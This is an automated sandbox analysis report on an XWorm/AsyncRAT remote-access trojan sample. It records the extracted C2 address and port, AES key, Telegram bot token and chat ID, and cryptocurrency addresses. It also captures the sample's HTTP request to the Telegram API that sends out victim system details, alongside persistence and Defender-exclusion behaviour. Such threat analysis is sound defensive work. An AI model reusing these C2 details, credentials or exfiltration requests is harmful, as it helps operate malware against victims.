Windows Analysis Report
Or3dzp4vB1.exe

Overview

General Information

Sample name: Or3dzp4vB1.exe
renamed because original name is a hash value
Original sample name: a02b12e6a3848148cf2ff394d0593c0532c57603f1a8fb74040e668284e33e70.exe
Analysis ID: 1518191
MD5: a1880883ff14f58135fc2db22f46a8ac
SHA1: cae4492fc961ef9cd08bcdbfd5b9b781f6458471
SHA256: a02b12e6a3848148cf2ff394d0593c0532c57603f1a8fb74040e668284e33e70
Tags: 185-196-10-235AsyncRATexeuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: Or3dzp4vB1.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\0720XW Avira: detection malicious, Label: TR/Spy.Gen
Source: Or3dzp4vB1.exe Malware Configuration Extractor: Xworm {"C2 url": ["185.196.10.235"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "windefender.exe", "Telegram URL": "https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638"}
Source: Or3dzp4vB1.exe.7300.0.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage"}
Source: C:\Users\user\AppData\Roaming\0720XW ReversingLabs: Detection: 84%
Source: Or3dzp4vB1.exe ReversingLabs: Detection: 84%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\0720XW Joe Sandbox ML: detected
Source: Or3dzp4vB1.exe Joe Sandbox ML: detected
Source: Or3dzp4vB1.exe String decryptor: 185.196.10.235
Source: Or3dzp4vB1.exe String decryptor: 7000
Source: Or3dzp4vB1.exe String decryptor: <123456789>
Source: Or3dzp4vB1.exe String decryptor: <Xwormmm>
Source: Or3dzp4vB1.exe String decryptor: 0720
Source: Or3dzp4vB1.exe String decryptor: windefender.exe
Source: Or3dzp4vB1.exe String decryptor: %AppData%
Source: Or3dzp4vB1.exe String decryptor: 0720XW
Source: Or3dzp4vB1.exe String decryptor: bc1q33ptlu39p0m6agnvyqus3c59fc84ecayq3xn6p
Source: Or3dzp4vB1.exe String decryptor: 0x797e0D2F78aD544E66cC5959a3f9c17C30e68FeD
Source: Or3dzp4vB1.exe String decryptor: TRC20_Address
Source: Or3dzp4vB1.exe String decryptor: 7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs
Source: Or3dzp4vB1.exe String decryptor: 6857243638
Source: Or3dzp4vB1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: Or3dzp4vB1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

barindex
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49705 -> 149.154.167.220:443
Source: Malware configuration extractor URLs: 185.196.10.235
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: Or3dzp4vB1.exe, type: SAMPLE
Source: Yara match File source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED
Source: global traffic TCP traffic: 192.168.2.7:49706 -> 185.196.10.235:7000
Source: global traffic HTTP traffic detected: GET /bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A14ADFDFE8FE6B38195AF%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209YUNKW3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%200720 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A14ADFDFE8FE6B38195AF%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209YUNKW3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%200720 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Wed, 25 Sep 2024 12:05:59 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: powershell.exe, 0000000F.00000002.1569980075.00000224B5803000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m(l
Source: powershell.exe, 0000000B.00000002.1389137672.000001E8B5A0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000B.00000002.1389137672.000001E8B5A0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic?8
Source: powershell.exe, 0000000B.00000002.1389137672.000001E8B5A0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micM;
Source: powershell.exe, 0000000B.00000002.1389343961.000001E8B5A1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros
Source: svchost.exe, 0000001A.00000002.2483028491.000001C437CCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.26.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.26.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1281766413.0000017A90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1371294998.000001E8AD496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1545020931.00000224AD0B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1266561753.0000017A80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D26A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Or3dzp4vB1.exe, 00000000.00000002.2485100318.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1266561753.0000017A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661DF91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1266561753.0000017A80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D26A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.1765571811.0000016636470000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 0000000B.00000002.1386984770.000001E8B58A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1571333595.00000224B5857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000011.00000002.1765571811.0000016636470000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co3
Source: powershell.exe, 00000002.00000002.1289901130.0000017AF7750000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://.VisualC
Source: powershell.exe, 00000002.00000002.1266561753.0000017A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661DF91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: Or3dzp4vB1.exe, 00000000.00000002.2485100318.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Or3dzp4vB1.exe, 0720XW.0.dr String found in binary or memory: https://api.telegram.org/bot
Source: Or3dzp4vB1.exe, 00000000.00000002.2485100318.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=68572
Source: powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: edb.log.26.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000001A.00000003.1925125933.000001C43D230000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000011.00000002.1608470648.000001661E1B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1281766413.0000017A90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1371294998.000001E8AD496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1545020931.00000224AD0B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.26.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

Operating System Destruction

barindex
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: Or3dzp4vB1.exe, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCB30C9 0_2_00007FFAACCB30C9
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCBA0E6 0_2_00007FFAACCBA0E6
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCBAE92 0_2_00007FFAACCBAE92
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCB1A66 0_2_00007FFAACCB1A66
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCB9299 0_2_00007FFAACCB9299
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCB3A96 0_2_00007FFAACCB3A96
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCB21D1 0_2_00007FFAACCB21D1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCB9725 0_2_00007FFAACCB9725
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCB3ABD 0_2_00007FFAACCB3ABD
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCB8034 0_2_00007FFAACCB8034
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Code function: 0_2_00007FFAACCB7839 0_2_00007FFAACCB7839
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAACD730E9 17_2_00007FFAACD730E9
Source: C:\Users\user\AppData\Roaming\0720XW Code function: 22_2_00007FFAACCD0F08 22_2_00007FFAACCD0F08
Source: C:\Users\user\AppData\Roaming\0720XW Code function: 22_2_00007FFAACCD0EFA 22_2_00007FFAACCD0EFA
Source: C:\Users\user\AppData\Roaming\0720XW Code function: 22_2_00007FFAACCD21D1 22_2_00007FFAACCD21D1
Source: C:\Users\user\AppData\Roaming\0720XW Code function: 22_2_00007FFAACCD1A66 22_2_00007FFAACCD1A66
Source: C:\Users\user\AppData\Roaming\0720XW Code function: 28_2_00007FFAACCA0F08 28_2_00007FFAACCA0F08
Source: C:\Users\user\AppData\Roaming\0720XW Code function: 28_2_00007FFAACCA0EFA 28_2_00007FFAACCA0EFA
Source: C:\Users\user\AppData\Roaming\0720XW Code function: 28_2_00007FFAACCA21D1 28_2_00007FFAACCA21D1
Source: C:\Users\user\AppData\Roaming\0720XW Code function: 28_2_00007FFAACCA1A66 28_2_00007FFAACCA1A66
Source: Or3dzp4vB1.exe, 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameXW0720nocryp.exe4 vs Or3dzp4vB1.exe
Source: Or3dzp4vB1.exe Binary or memory string: OriginalFilenameXW0720nocryp.exe4 vs Or3dzp4vB1.exe
Source: Or3dzp4vB1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Or3dzp4vB1.exe, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Or3dzp4vB1.exe, v1WK3HQ1SJk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Or3dzp4vB1.exe, v1WK3HQ1SJk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Or3dzp4vB1.exe, 6tNVwwp2mfC.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0720XW.0.dr, v1WK3HQ1SJk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0720XW.0.dr, v1WK3HQ1SJk.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0720XW.0.dr, 6tNVwwp2mfC.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Or3dzp4vB1.exe, fKaGa2Ywr5w3PQGiDmBI7REAS2.cs Base64 encoded string: 'HilI89vmEy3+3GvPO/Zq1i4recitTkgorg9ve3fPiOo5zLC01F6N7DLcrdUBCIFx'
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs Base64 encoded string: 'IHK89lkCtBB5vfur6GRlbIxvTLBLnTcx1AYnCVCaiKLhJZrqCz3kxSPcpbPVQyprS22PuVQX0CV0', 'usPCIXgMSiPCW2a9KH5r8Lrlui1dLmaxzgbQjrrui9qEzj12fO3Lg6SKq0cgL9WDu6NbQbdrJPpW', 'oZsFzgfSzGmhTJnzBuXETJz584ygJMu1zIFGJkEqxt4uGLkuhBun03qvhwUuU7YeVlHjZRCNPXvC', 'QZMc7GRSKwFrVgH9rEPsZq3HEnGstOk3d9dQp2WuqL2TzBUE2wsvhxZGFyQGb1d1heCczfLmUPjV', 'yTGOzf8oR1loLGeyyq1BIlPlRx6YVGYovMX1XfblvqHM9JrnC2w6adckICDABf546KOYUX5VuHwo', 'Sg7K3fHQLanNhYTcpLzXaVah9J9KDxgbL7RZoHoh4YhNhsjhLggIH7fgEs2CjA948WWvyRYCKxsx', 'he1IE8hoZ57VvXji8U8VyKAT9DdsrqfZysr6jYHJdbea0bIzWp5ylgg9bo20uZNaZ5lCbEDANpOC', 'mMueayJXa6lLNBiAZsU2eZ8A2IlSyoUaZTu1AXTPGnB7ooCt3FxNdZCw3QVUAbkl5IxmAmoYxZvf', 'p9Ct1Zb3Fgq1WyOZ1VoBQvuwSA2smbYIeuF3anajE96oILiEjmr2tkHiZfRIeEtWrV8l3NZIN7Ok'
Source: Or3dzp4vB1.exe, 2PiJ0XhLI0Qp8KhHBi10nRhXgt.cs Base64 encoded string: 'knu9TUqgRYIfI4E5X5wNmdmJT0Cxg3JcvfF7PpCVJO1XIcQs7LPeZaZ9wdhMjA4RFGAKlQZHD8S0', 'kHQiIHSO9Kf99paGMOmuUztOpDxvbesEuyfyaWiI3TJ6jMitsMGkTxc90qvK50wVPXFxT5ncFxlt', 'VlT7z0JCh3YJjqJg608rv8IcqGXGK3zqYKsAcfdQGkCe4y9aYLv6k6QXXNOWizwklryiKXIcFt6h', 'rdSsY44lE3KvEXBc1QQLKcmt2O4KSOuBGNHiMmTz8OuSKtWwzu3MsKPhI9vlJB7bPAGNqT7mvkCM', 'WqGt6trqdPpjPzyE6tvafv1X2Mo5qqywVdXBkacmRM96QjC09Vgzrrp7tGs1e9Zt0MEEFmoNsWU8', 'RnZgapsSPxabwmdeDT16quYvdSJGX8KMh8Kt3EYWiVlWLDNB84wJjVz9ZMb9hJpCOTQA3yi9D709', 'Q70lD5Gfj01jIb86ofJJsDUOhHuXjU23PrVnwQZlWojXd7VIMM6dYZXVG0qFQtr7yRRAOtY14sBd', 'zBG4RDGY8ZDfy6M6DJofyurpVML5QD2hX92W4si3kJJEaRo0jeeBtrrahwUS2CdjZvsjc4T01OXj', 'xFOzls2ynucfnume2FOfVvI0hwIukj7AgMrGZGJL3Rj7m9G1unpV6ebqtW24s4edNMholZ1yQeKo', 'wbnM5bQH73Hk0UufygBhXin212TRwHD0PnrnIrICigLXRYjD5jYVTjLQyq44YB7b90PEoV3Ay2Rg', 'ls71cymv2T1wIkDbRSytIx2a8oOKcMJSohmCOJitocd5Q5NEGC16aqRNzCi4Tr8oPuMiW2UDpxeH', 'JX1rWKPR7N2qLAoW2kyb1e0xdI6bY0UMy71SmjsOUpA5Ip2CZH5RRCWEIWhqN2Wx7iFeTuwfh1rR'
Source: Or3dzp4vB1.exe, jGEa6BYs0PLz0bPSuuML3cXJ6C.cs Base64 encoded string: 'QhrViXqTfY1h9moGZtOOwQNg7WqV8hrGketiPV0XuOkN81GinEd8iKHg9NS8HxJphAP3OJMMkuzn', 'tmmAwDypQckEBbY9dk9zRvaQpaFwGlKTpNQ167TjPQxlOkiptbZoJLvoYGLZaVTMc43nMgUx76ZT'
Source: Or3dzp4vB1.exe, T8OeMrVcLjImLRIolSzxRmx4be.cs Base64 encoded string: 'TFbA2nhOqXhoA73fG8a5dOFln337an8NKCsvOHCcJJ18u1DDcv2wzZNNPqQq0PGDAxGs4TQU1yxg', 'QYmrSQgddbPlLLg3QKk1A7Q5tWEegKXrjJS4v57gkJ7DC7JlFphN3ZteJGcdkuTAw58W0tXqOVes', 'iS16qM0NJIZEBuAzFuHT6eV3lIyQsgvBim5hMLBlO9v8RMA6zcqFZJac9ALKHjmVwnpi77YcRAcu', 'm5yO9k7XaSllATXq6wVy6AH8dABHQUzn5DdDsYRaJrCtZy7yn6C1KeQIvH7MQUMhQxvH2S57nNDX'
Source: 0720XW.0.dr, fKaGa2Ywr5w3PQGiDmBI7REAS2.cs Base64 encoded string: 'HilI89vmEy3+3GvPO/Zq1i4recitTkgorg9ve3fPiOo5zLC01F6N7DLcrdUBCIFx'
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs Base64 encoded string: 'IHK89lkCtBB5vfur6GRlbIxvTLBLnTcx1AYnCVCaiKLhJZrqCz3kxSPcpbPVQyprS22PuVQX0CV0', 'usPCIXgMSiPCW2a9KH5r8Lrlui1dLmaxzgbQjrrui9qEzj12fO3Lg6SKq0cgL9WDu6NbQbdrJPpW', 'oZsFzgfSzGmhTJnzBuXETJz584ygJMu1zIFGJkEqxt4uGLkuhBun03qvhwUuU7YeVlHjZRCNPXvC', 'QZMc7GRSKwFrVgH9rEPsZq3HEnGstOk3d9dQp2WuqL2TzBUE2wsvhxZGFyQGb1d1heCczfLmUPjV', 'yTGOzf8oR1loLGeyyq1BIlPlRx6YVGYovMX1XfblvqHM9JrnC2w6adckICDABf546KOYUX5VuHwo', 'Sg7K3fHQLanNhYTcpLzXaVah9J9KDxgbL7RZoHoh4YhNhsjhLggIH7fgEs2CjA948WWvyRYCKxsx', 'he1IE8hoZ57VvXji8U8VyKAT9DdsrqfZysr6jYHJdbea0bIzWp5ylgg9bo20uZNaZ5lCbEDANpOC', 'mMueayJXa6lLNBiAZsU2eZ8A2IlSyoUaZTu1AXTPGnB7ooCt3FxNdZCw3QVUAbkl5IxmAmoYxZvf', 'p9Ct1Zb3Fgq1WyOZ1VoBQvuwSA2smbYIeuF3anajE96oILiEjmr2tkHiZfRIeEtWrV8l3NZIN7Ok'
Source: 0720XW.0.dr, 2PiJ0XhLI0Qp8KhHBi10nRhXgt.cs Base64 encoded string: 'knu9TUqgRYIfI4E5X5wNmdmJT0Cxg3JcvfF7PpCVJO1XIcQs7LPeZaZ9wdhMjA4RFGAKlQZHD8S0', 'kHQiIHSO9Kf99paGMOmuUztOpDxvbesEuyfyaWiI3TJ6jMitsMGkTxc90qvK50wVPXFxT5ncFxlt', 'VlT7z0JCh3YJjqJg608rv8IcqGXGK3zqYKsAcfdQGkCe4y9aYLv6k6QXXNOWizwklryiKXIcFt6h', 'rdSsY44lE3KvEXBc1QQLKcmt2O4KSOuBGNHiMmTz8OuSKtWwzu3MsKPhI9vlJB7bPAGNqT7mvkCM', 'WqGt6trqdPpjPzyE6tvafv1X2Mo5qqywVdXBkacmRM96QjC09Vgzrrp7tGs1e9Zt0MEEFmoNsWU8', 'RnZgapsSPxabwmdeDT16quYvdSJGX8KMh8Kt3EYWiVlWLDNB84wJjVz9ZMb9hJpCOTQA3yi9D709', 'Q70lD5Gfj01jIb86ofJJsDUOhHuXjU23PrVnwQZlWojXd7VIMM6dYZXVG0qFQtr7yRRAOtY14sBd', 'zBG4RDGY8ZDfy6M6DJofyurpVML5QD2hX92W4si3kJJEaRo0jeeBtrrahwUS2CdjZvsjc4T01OXj', 'xFOzls2ynucfnume2FOfVvI0hwIukj7AgMrGZGJL3Rj7m9G1unpV6ebqtW24s4edNMholZ1yQeKo', 'wbnM5bQH73Hk0UufygBhXin212TRwHD0PnrnIrICigLXRYjD5jYVTjLQyq44YB7b90PEoV3Ay2Rg', 'ls71cymv2T1wIkDbRSytIx2a8oOKcMJSohmCOJitocd5Q5NEGC16aqRNzCi4Tr8oPuMiW2UDpxeH', 'JX1rWKPR7N2qLAoW2kyb1e0xdI6bY0UMy71SmjsOUpA5Ip2CZH5RRCWEIWhqN2Wx7iFeTuwfh1rR'
Source: 0720XW.0.dr, jGEa6BYs0PLz0bPSuuML3cXJ6C.cs Base64 encoded string: 'QhrViXqTfY1h9moGZtOOwQNg7WqV8hrGketiPV0XuOkN81GinEd8iKHg9NS8HxJphAP3OJMMkuzn', 'tmmAwDypQckEBbY9dk9zRvaQpaFwGlKTpNQ167TjPQxlOkiptbZoJLvoYGLZaVTMc43nMgUx76ZT'
